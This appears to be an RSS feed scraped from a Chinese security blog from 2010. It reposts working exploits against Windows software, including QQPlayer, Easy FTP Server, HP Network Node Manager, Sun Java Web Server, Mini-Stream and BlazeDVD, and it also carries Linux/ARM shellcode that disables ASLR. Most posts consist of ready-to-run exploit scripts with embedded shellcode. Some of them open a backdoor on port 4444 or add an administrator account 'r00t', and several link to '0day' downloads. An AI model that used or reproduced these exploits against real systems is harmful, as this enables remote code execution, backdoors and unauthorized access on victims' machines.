SpookZanG » 编程溢出 http://www.spookzang.net 安全,漏洞,发现,共享,交流 Tue, 27 Jul 2010 15:28:29 +0000 en hourly 1 http://wordpress.org/?v=3.0 QQPlayer cue 文件缓冲区溢出漏洞 http://www.spookzang.net/article/1934 http://www.spookzang.net/article/1934#comments Tue, 27 Jul 2010 15:28:29 +0000 admin http://www.spookzang.net/?p=1934 QQPlayer cue 文件缓冲区溢出漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

 
#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
 
head = '''FILE "'''
junk = "A" * 780
nseh ="\x42\x61\x21\x61"
seh  ="\xa9\x9e\x41\x00"
adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
           "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
           "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
           "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_="R"*8000
foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08"
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open("poc.cue","w")
fobj.write(payload)
fobj.close()
]]> http://www.spookzang.net/article/1934/feed 0 Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞 http://www.spookzang.net/article/1927 http://www.spookzang.net/article/1927#comments Mon, 19 Jul 2010 08:48:03 +0000 admin http://www.spookzang.net/?p=1927 Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞,以及0day程序。

漏洞利用程序下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:
 
import socket
import sys
 
buffersize = 268
 
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
shellcode = ("\xb8\xf1\x18\xc7\x71\xd9\xc7\x29\xc9\xb1\x33\xd9\x74\x24\xf4"
"\x5b\x31\x43\x12\x83\xeb\xfc\x03\xb2\x16\x25\x84\xc8\xcf\x20"
"\x67\x30\x10\x53\xe1\xd5\x21\x41\x95\x9e\x10\x55\xdd\xf2\x98"
"\x1e\xb3\xe6\x2b\x52\x1c\x09\x9b\xd9\x7a\x24\x1c\xec\x42\xea"
"\xde\x6e\x3f\xf0\x32\x51\x7e\x3b\x47\x90\x47\x21\xa8\xc0\x10"
"\x2e\x1b\xf5\x15\x72\xa0\xf4\xf9\xf9\x98\x8e\x7c\x3d\x6c\x25"
"\x7e\x6d\xdd\x32\xc8\x95\x55\x1c\xe9\xa4\xba\x7e\xd5\xef\xb7"
"\xb5\xad\xee\x11\x84\x4e\xc1\x5d\x4b\x71\xee\x53\x95\xb5\xc8"
"\x8b\xe0\xcd\x2b\x31\xf3\x15\x56\xed\x76\x88\xf0\x66\x20\x68"
"\x01\xaa\xb7\xfb\x0d\x07\xb3\xa4\x11\x96\x10\xdf\x2d\x13\x97"
"\x30\xa4\x67\xbc\x94\xed\x3c\xdd\x8d\x4b\x92\xe2\xce\x33\x4b"
"\x47\x84\xd1\x98\xf1\xc7\xbf\x5f\x73\x72\x86\x60\x8b\x7d\xa8"
"\x08\xba\xf6\x27\x4e\x43\xdd\x0c\xa0\x09\x7c\x24\x29\xd4\x14"
"\x75\x34\xe7\xc2\xb9\x41\x64\xe7\x41\xb6\x74\x82\x44\xf2\x32"
"\x7e\x34\x6b\xd7\x80\xeb\x8c\xf2\xe2\x6a\x1f\x9e\xca\x09\xa7"
"\x05\x13")
 
eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll
nopsled = "\x90" * 16
 
payload = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
 
def ExploitEasyFTP(target):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((target, 21))
    s.recv(1024)
    s.send('User anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.send('CWD '+nopsled+shellcode+payload+eip+'\r\n')
    s.recv(1024)
    s.send('QUIT ftp\r\n')
    s.close()
 
target = sys.argv[1]
 
ExploitEasyFTP(target)
]]> http://www.spookzang.net/article/1927/feed 0 惠普 Network Node Manager 7.53 缓冲区溢出漏洞+0day http://www.spookzang.net/article/1923 http://www.spookzang.net/article/1923#comments Fri, 16 Jul 2010 04:20:19 +0000 admin http://www.spookzang.net/?p=1923 HP Network Node Manager (NNM) 7.53缓冲区溢出漏洞+0day。

如图运行下面语句即可打开一个端口为4444的后门。

1

C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC
]]> http://www.spookzang.net/article/1923/feed 0 Excel 0x5D 记录缓冲区溢出0day程序 http://www.spookzang.net/article/1919 http://www.spookzang.net/article/1919#comments Thu, 15 Jul 2010 05:35:43 +0000 admin http://www.spookzang.net/?p=1919 Excel 0x5D 记录缓冲区溢出漏洞!受影响的版本是Office 2007.
点击下载利用程序

]]> http://www.spookzang.net/article/1919/feed 0 Real Player 12.0.0.879 Windows Xp 0day http://www.spookzang.net/article/1898 http://www.spookzang.net/article/1898#comments Fri, 09 Jul 2010 06:57:11 +0000 admin http://www.spookzang.net/?p=1898 这个漏洞是利用了Windows Xp的RCE漏洞。从而使得安装过Real Player 的用户能在播放的时候,触发漏洞,从而执行黑客所想执行那个的程序。(如图)

漏洞利用程序下载:rp-0day
解压密码为:1

]]> http://www.spookzang.net/article/1898/feed 0 Java Web Sever 7.0 远程漏洞 http://www.spookzang.net/article/1880 http://www.spookzang.net/article/1880#comments Sun, 04 Jul 2010 06:21:35 +0000 admin http://www.spookzang.net/?p=1880 作者:dmc

代码下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192

/* Sun Java Web Server Exploit
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 * This vulnerability was identified by Evgeny Legerov
 *
 * Author: Dominic Chell <dmc@deadbeef.co.uk>
 * Date: 23/01/2010
 */
 
#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"
 
#pragma comment(lib, "ws2_32")
 
#define usage(){ (void)fprintf(stderr, "SJWSex vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\nExample: sjwsex.exe [ip] [port] [directory]\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}
 
// encoding the payloads in URL hex prevents it getting converted to unicode
char seh[] = "%ee%7b%01%12"; // 0x12017bee
char nextseh[] ="%eb%10%90%90"; // jmp
char *nop = "%90"; // nop
char egghunter[] = "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
char *egg = "%77%30%30%74%77%30%30%74"; // w00tw00t
// adduser r00t / r00tr00t123
char shellcode[] =
       "%89%e6%db%cd%d9%76%f4%58%50%59%49%49%49%49%43"
       "%43%43%43%43%43%51%5a%56%54%58%33%30%56%58%34"
       "%41%50%30%41%33%48%48%30%41%30%30%41%42%41%41"
       "%42%54%41%41%51%32%41%42%32%42%42%30%42%42%58"
       "%50%38%41%43%4a%4a%49%4b%4c%4d%38%4b%39%45%50"
       "%45%50%43%30%43%50%4d%59%4b%55%46%51%48%52%42"
       "%44%4c%4b%46%32%50%30%4c%4b%46%32%44%4c%4c%4b"
       "%51%42%44%54%4c%4b%42%52%46%48%44%4f%4f%47%51"
       "%5a%47%56%46%51%4b%4f%50%31%49%50%4e%4c%47%4c"
       "%43%51%43%4c%45%52%46%4c%47%50%49%51%48%4f%44"
       "%4d%43%31%48%47%4d%32%4c%30%46%32%46%37%4c%4b"
       "%50%52%44%50%4c%4b%47%32%47%4c%45%51%48%50%4c"
       "%4b%51%50%43%48%4d%55%49%50%44%34%51%5a%45%51"
       "%48%50%50%50%4c%4b%47%38%44%58%4c%4b%50%58%51"
       "%30%45%51%4e%33%4a%43%47%4c%51%59%4c%4b%47%44"
       "%4c%4b%45%51%4e%36%46%51%4b%4f%46%51%49%50%4e"
       "%4c%49%51%48%4f%44%4d%43%31%48%47%50%38%4b%50"
       "%43%45%4a%54%43%33%43%4d%4b%48%47%4b%43%4d%47"
       "%54%43%45%4a%42%46%38%4c%4b%50%58%46%44%45%51"
       "%48%53%42%46%4c%4b%44%4c%50%4b%4c%4b%50%58%45"
       "%4c%43%31%49%43%4c%4b%44%44%4c%4b%45%51%4e%30"
       "%4d%59%50%44%47%54%46%44%51%4b%51%4b%45%31%50"
       "%59%50%5a%46%31%4b%4f%4b%50%46%38%51%4f%50%5a"
       "%4c%4b%42%32%4a%4b%4b%36%51%4d%43%5a%43%31%4c"
       "%4d%4b%35%4e%59%45%50%43%30%43%30%46%30%43%58"
       "%46%51%4c%4b%42%4f%4d%57%4b%4f%48%55%4f%4b%4b"
       "%50%45%4d%46%4a%45%5a%45%38%49%36%4a%35%4f%4d"
       "%4d%4d%4b%4f%48%55%47%4c%45%56%43%4c%44%4a%4d"
       "%50%4b%4b%4d%30%42%55%44%45%4f%4b%50%47%42%33"
       "%42%52%42%4f%42%4a%43%30%46%33%4b%4f%4e%35%45"
       "%33%42%4d%45%34%46%4e%43%55%44%38%45%35%51%30"
       "%46%4f%43%53%47%50%42%4e%45%35%42%54%51%30%43"
       "%45%42%53%45%35%43%42%51%30%44%32%50%30%46%50"
       "%42%54%51%30%43%42%46%50%46%50%42%54%44%32%50"
       "%30%46%50%43%44%46%51%46%52%46%53%47%50%46%4f"
       "%51%51%50%44%51%54%47%50%51%36%46%46%51%30%42"
       "%4e%43%55%44%34%51%30%42%4c%42%4f%45%33%45%31"
       "%42%4c%43%57%43%42%42%4f%44%35%42%50%47%50%51"
       "%51%42%44%42%4d%45%39%42%4e%43%59%42%53%44%34"
       "%44%32%45%31%43%44%42%4f%43%42%42%53%51%30%42"
       "%52%46%50%46%50%42%54%51%30%46%4f%47%31%50%44"
       "%51%54%45%50%45%5a%41%41";
 
int send_buffer(int ipaddr, int port, char *buffer)
{
       SOCKET s;
       struct fd_set mask;
       struct timeval timeout;
       struct sockaddr_in server;
       WSADATA info;
       if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");
 
       s=socket(AF_INET,SOCK_STREAM,0);
       if (s==INVALID_SOCKET) error("[*] socket error");
       server.sin_family=AF_INET;
       server.sin_addr.s_addr=htonl(ipaddr);
       server.sin_port=htons(port);
 
       WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
       timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
 
       select(s+1,NULL,&mask,NULL,&timeout);
       if(FD_ISSET(s,&mask))
       {
               if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error("[*] error sending buffer\n");
               closesocket(s);
               return 0;
       }
}
 
int main(int argc, char *argv[])
{
       char *verb="GET /";
       char *options="OPTIONS /";
       char *version=" HTTP/1.0";
       char *directory="";
       char *payload, *ptr, *buffer;
       char nops[31], padding[130];
 
       if(argc < 4)
       {
               usage();
               return 0;
       }
 
       memset(nops, 0x00, sizeof(nops));
       memset(padding, 0x00, sizeof(padding));
 
       int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
       directory = argv[3];
       fprintf(stderr, "SJWSex vs Sun Java Web Server 7.0 u7\n(C) dmc <dmc@deadbeef.co.uk>\n\n");
 
       // build payload and place shellcode in memory
       payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
       memset(payload, 0x00, sizeof(payload));
       ptr=payload;
 
       memcpy(ptr, verb, strlen(verb));
       ptr+=strlen(verb);
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, "\n\0", 2);
 
       fprintf(stderr, "%s\n", "[*] Filling memory with shellcode");
       for (int i=0; i<4; i++)
       {
               send_buffer(ipaddr, port, payload);
       }
 
       // build final buffer and overwrite seh
       // [ OPTIONS / | DIRECTORY | PADDING | EGG | SHELLLCODE | NEXTSEH | SEH | NOPS | EGGHUNTER | HTTPVERSION ]
       buffer=(char*)malloc(strlen(options)+strlen(directory)+strlen(egg)+strlen(shellcode)+strlen(nextseh)+strlen(seh)+strlen(egghunter)+strlen(version)+163);
       memset(buffer, 0x00, sizeof(buffer));
       ptr=buffer;
 
       memcpy(ptr, options, strlen(options));
       ptr+=strlen(options);
       memcpy(ptr, directory, strlen(directory));
       ptr+=strlen(directory);
       memcpy(ptr, "/", 1);
       ptr++;
 
       for(int i=0;i<129;i++)
               padding[i] = 'A';
 
       memcpy(ptr, padding, strlen(padding));
       ptr+=strlen(padding);
 
       memcpy(ptr, egg, strlen(egg));
       ptr+=strlen(egg);
 
       memcpy(ptr, shellcode, strlen(shellcode));
       ptr+=strlen(shellcode);
 
       memcpy(ptr, nextseh, strlen(nextseh));
       ptr+=strlen(nextseh);
 
       memcpy(ptr, seh, strlen(seh));
       ptr+=strlen(seh);
 
       for(int i=0;i<10;i++)
               strcat(nops, nop);
       memcpy(ptr, nops, strlen(nops));
       ptr+=strlen(nops);
 
       memcpy(ptr, egghunter, strlen(egghunter));
       ptr+=strlen(egghunter);
 
       memcpy(ptr, version, strlen(version));
       ptr+=strlen(version);
       memcpy(ptr, "\n\n\0", 3);
 
       fprintf(stderr, "%s\n", "[*] Sending final buffer");
       send_buffer(ipaddr, port, buffer);
       fprintf(stderr, "%s\n", "[*] Wait 2 minutes and connect with r00t / r00tr00t123");
 
       return 0;
}
]]> http://www.spookzang.net/article/1880/feed 1 Mini-Stream RM-Mp3 转换器 v3.1.2.1 缓冲区溢出漏洞 http://www.spookzang.net/article/1773 http://www.spookzang.net/article/1773#comments Fri, 02 Jul 2010 01:54:06 +0000 admin http://www.spookzang.net/?p=1773 Mini-Stream是CD抓轨到mp3、wav、rm或wma格式;支持wav、mp3、rm、rmvb、ra、ram、rmj、wma、wmv、asx、asf媒体文件转换到wav、mp3、rm、wma音频文件;支持不同转换速率的设置;支持一个媒体文件同时转换到wav、mp3、rm、wma四个音频文件;十分简单易用。

但是其RM转MP3的程序出现了缓冲区溢出漏洞.

点击下载利用代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

#By Madjix Dz8[at]hotmail[dot]com
#Greets: myself for find the bug :)
#
# Notes from EDB:
# 000DBF98 41414141 AAAA
# 000DBF9C 41414141 AAAA
# 000DBFA0 41414141 AAAA
# 000DBFA4 41414141 AAAA Pointer to next SEH record
# 000DBFA8 41414141 AAAA SE handler
# 000DBFAC FFFFFFFF ÿÿÿÿ
# 000DBFB0 7C87F317 ó‡| kernel32.7C87F317
# 000DBFB4 90909090 
# 000DBFB8 90909090 
# 000DBFBC 90909090
#
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\
x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $jnk="\x41" x 43488 ;
my $nseh="\xeb\x06\x90\x90" ;
my $seh="\x17\xF3\x87\x7C" ;
my $nops = "\x90" x 24 ;
 
open(MYFILE,'>>MadjiX.m3u');
print MYFILE $jnk.$nseh.$seh.$nops.$shellcode;
close(MYFILE);
]]> http://www.spookzang.net/article/1773/feed 0 Linux/ARM 禁用”ASLR安全”的代码 http://www.spookzang.net/article/1770 http://www.spookzang.net/article/1770#comments Thu, 01 Jul 2010 02:45:53 +0000 admin http://www.spookzang.net/?p=1770 Address space layout randomization【ASLR】是防止缓冲区溢出的技术,通过对栈、共享库映射等线性区布局的随机化,防止攻击者定位攻击代码位置,达到阻止溢出攻击的目的。据研究表明ASLR可以有效的降低缓冲区溢出攻击的成功率,如今Linux、FreeBSD、Windows等主流操作系统都已采用了该技术。

代码下载

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

/*
Title:  Linux/ARM - Disable ASLR Security - 102 bytes
Date:   2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
 
Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm
 
! Database of shellcodes http://www.shell-storm.org/shellcode/
 
 
Description:
============
 Address space layout randomization (ASLR) is a computer security technique
 which involves randomly arranging the positions of key data areas, usually
 including the base  of the executable and position of libraries, heap, and
 stack, in a process's address space.
 
 This shellcode disables the ASLR on linux/ARM
 
*/
 
#include <stdio.h>
 
char *SC = "\x01\x30\x8f\xe2"  // add    r3, pc, #1
           "\x13\xff\x2f\xe1"  // bx     r3
           "\x24\x1b"          // subs   r4, r4, r4
           "\x20\x1c"          // adds   r0, r4, #0
           "\x17\x27"          // movs   r7, #23
           "\x01\xdf"          // svc    1
           "\x78\x46"          // mov    r0, pc
           "\x2e\x30"          // adds   r0, #46
           "\xc8\x21"          // movs   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\x59\x31"          // adds   r1, #89
           "\xc8\x22"          // movs   r2, #200
           "\xc8\x32"          // adds   r2, #200
           "\x14\x32"          // adds   r2, #20
           "\x05\x27"          // movs   r7, #5
           "\x01\xdf"          // svc    1
           "\x03\x20"          // movs   r0, #3
           "\x79\x46"          // mov    r1, pc
           "\x0e\x31"          // adds   r1, #14
           "\x02\x22"          // movs   r2, #2
           "\x04\x27"          // movs   r7, #4
           "\x01\xdf"          // svc    1
           "\x92\x1a"          // subs   r2, r2, r2
           "\x10\x1c"          // adds   r0, r2, #0
           "\x01\x27"          // movs   r7, #1
           "\x01\xdf"          // svc    1
 
           "\x30\x0a"          // ^
           "\x2d\x2d"          // |
           "\x2f\x2f"          // |
           "\x70\x72"          // |
           "\x6f\x63"          // |
           "\x2f\x73"          // |
           "\x79\x73"          // |
           "\x2f\x6b"          // |
           "\x65\x72"          // |
           "\x6e\x65"          // |  [ strings ]
           "\x6c\x2f"          // |
           "\x72\x61"          // |
           "\x6e\x64"          // |
           "\x6f\x6d"          // |
           "\x69\x7a"          // |
           "\x65\x5f"          // |
           "\x76\x61"          // |
           "\x5f\x73"          // |
           "\x70\x61"          // |
           "\x63\x65";         // v
 
 
int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}
]]> http://www.spookzang.net/article/1770/feed 0 Adobe Reader 9.3.2 (CoolType.dll) 远程内存损坏和拒绝服务漏洞 http://www.spookzang.net/article/1658 http://www.spookzang.net/article/1658#comments Wed, 30 Jun 2010 03:24:43 +0000 admin http://www.spookzang.net/?p=1658 作者:[]0iZy5

利用代码下载

Adobe Reader 是用于打开和使用在 Adobe Acrobat 中创建的 Adobe PDF 的工具。 虽然无法在 Reader 中创建 PDF,但是可以使用 Reader 查看、打印和管理 PDF。在 Reader 中打开 PDF 后,可以使用多种工具快速查找信息。

这回出现了远程内存破坏漏洞,和拒绝服务漏洞。请各位及时更新。

]]> http://www.spookzang.net/article/1658/feed 0 BlazeDVD v6.0缓冲区溢出漏洞 http://www.spookzang.net/article/1458 http://www.spookzang.net/article/1458#comments Sun, 27 Jun 2010 15:50:18 +0000 admin http://www.spookzang.net/?p=1458 作者:Blake

BlazeDVD出现了缓冲区溢出漏洞,让我们看看它的问题以及漏洞利用程序。

点击下载利用程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
include Msf::Exploit::FILEFORMAT
 
def initialize(info = {})
super(update_info(info,
'Name' => 'BlazeDVD 6.0 PLF Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in BlazeDVD 6.0.
When
the application is used to open a specially crafted plf
file,
a buffer is overwritten allowing for the execution of
arbitrary code.
Set the EXITFUNC to seh or thread for best results.
},
'License' => MSF_LICENSE,
'Author' => [ 'Blake' ],
'Version' => '$Revision 1$',
'References' =>
[
[ 'EDB-ID' , '13998' ],
[ 'BID', '35918' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1363,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'BlazeDVD 6.0 Universal', { 'Ret' => 0x6033077D } ],
],
'Privileged' => false,
'DisclosureDate' => 'June 23, 2010',
'DefaultTarget' => 0))
 
register_options(
[
OptString.new('FILENAME', [ false,
'The file name.', 'msf.plf']),
], self.class)
 
end
 
def exploit
 
plf = rand_text_alphanumeric(608)
plf << "\xeb\x06\x90\x90"
plf << [target.ret].pack('V')
plf << make_nops(20)
plf << payload.encoded
plf << rand_text_alphanumeric(1364 - payload.encoded.length)
 
print_status("Creating '#{datastore['FILENAME']}' file ...")
 
file_create(plf)
 
end
 
end
]]> http://www.spookzang.net/article/1458/feed 0